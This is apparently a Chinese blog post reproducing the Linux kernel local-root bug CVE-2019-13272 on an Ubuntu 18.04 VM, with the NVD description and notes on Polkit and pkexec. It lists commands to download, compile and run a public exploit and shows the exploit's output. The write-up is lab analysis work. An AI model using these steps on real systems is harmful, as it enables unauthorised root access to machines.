记录下CVE-2019-13272复现和注意事项

复现

OS: Ubuntu 18.04

Kernel: 4.18.0-15-generic

1564224042649

步骤

  1. 下载CVE-2019-13272POC:https://github.com/bcoles/kernel-exploits/blob/master/CVE-2019-13272/poc.c

    wget https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c

    1564224369282

  2. 编译gcc -s poc.c -o test

    1564224394522

  3. 赋予权限chmod +x test

    1564224422005

  4. 运行./test

    1564224440415

复现结束

既然能在桌面环境下提权,那在ssh下是否能提权呢?

继续验证

1564226297930

λ ssh [email protected]
The authenticity of host '10.2.2.133 (10.2.2.133)' can't be established.
ECDSA key fingerprint is SHA256:w8vbQc50yCuyVwaklzi+Xnnc94ZXkNshe+g8eg4o4ps.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.2.2.133' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.18.0-15-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

431 packages can be updated.
173 updates are security updates.

Your Hardware Enablement Stack (HWE) is supported until April 2023.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

test@ubuntu-vm:~$ ./test
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[!] Warning: Could not find active PolKit agent
[.] Searching for known helpers ...
[~] Found known helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper
[.] Using helper: /usr/lib/gnome-settings-daemon/gsd-backlight-helper
[.] Spawning suid process (/usr/bin/pkexec) ...
Error executing command as another user: Not authorized

This incident has been reported.
[-] Error: read(fd, buf, sizeof(buf)-1)
[~] Found known helper: /usr/lib/gnome-settings-daemon/gsd-wacom-led-helper
[.] Using helper: /usr/lib/gnome-settings-daemon/gsd-wacom-led-helper
[-] Error: pipe2(block_pipe, O_CLOEXEC|O_DIRECT)
[.] Searching for useful helpers ...
[-] Failed to run: /usr/bin/pkaction --verbose
test@ubuntu-vm:~$

显然无法执行,看下漏洞细节

截取自NVD

1564226068861

CVE-2019-13272 Detail

MODIFIED

This vulnerability has been modified since it was last analyzed by the NVD. It is awaiting reanalysis which may result in further changes to the information provided.

Current Description

In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles the recording of the credentials of a process that wants to create a ptrace relationship, which allows local users to obtain root access by leveraging certain scenarios with a parent-child process relationship, where a parent drops privileges and calls execve (potentially allowing control by an attacker). One contributing factor is an object lifetime issue (which can also cause a panic). Another contributing factor is incorrect marking of a ptrace relationship as privileged, which is exploitable through (for example) Polkit’s pkexec helper with PTRACE_TRACEME. 

kernel 5.1.17之前版本中存在安全漏洞,该漏洞源于kernel/ptrace.c文件的ptrace_link没有正确处理对凭证的记录。攻击者可利用该漏洞获取root访问权限。由于PTRACE_TRACEME允许的borked权限,利用bug在概念上很有趣。对象生命周期处理问题可能会导致内存损坏,但它需要以精确的方式进行代码竞争。事实PTRACE_TRACEME证明,除了父进程之外,内核还记录了跟踪器的凭据。研究人员概述的方案涉及一个父进程,该进程创建一个子进程,这个子进程会创建子进程。第一个子进程使用命令pkexec(用于以root身份运行程序),第二个子进程运行PTRACE_TRACEME,然后第一个子进程丢弃其权限。最终结果是父进程可以使用ptrace来控制第一个子进程,后者可以使用ptrace来控制第二个子进程 - 从而让攻击者获得对两个进程的控制权。

几个关键点

Polkit

Polkit 在系统层级进行权限控制,提供了一个低优先级进程和高优先级进程进行通讯的系统。和sudo等程序不同,Polkit 并没有赋予进程完全的 root 权限,而是通过一个集中的策略系统进行更精细的授权。

Polkit 定义出一系列操作,例如运行 GParted, 并将用户按照群组或用户名进行划分,例如 wheel 群组用户。然后定义每个操作是否可以由某些用户执行,执行操作前是否需要一些额外的确认,例如通过输入密码确认用户是不是属于某个群组。

pkexec

pkexec allows an authorized user to execute PROGRAM as another user. If username is not specified, then the program will be executed as the administrative super user, root.

pkexec允许授权用户作为另一个用户执行程序。如果没有指定用户名,则程序将作为管理超级用户root执行。

普通用户在SSH中使用pkexec时会显示如下需要密码验证

test@ubuntu-vm:~$ pkexec –user root whoami
==== AUTHENTICATING FOR org.freedesktop.policykit.exec ===
Authentication is needed to run `/usr/bin/whoami’ as the super user
Authenticating as: test,,, (test)
Password:

在Gnome桌面中

1564226895216

在server版本中实测无法提权

1564231549834

总结

通过poc代码中的部分代码,推测为gnome桌面程序存在的缺陷导致用户可以实现代码层面的条件竞争导致了提权,但是实战中多数服务器不会配备桌面环境,属比较鸡肋的提权漏洞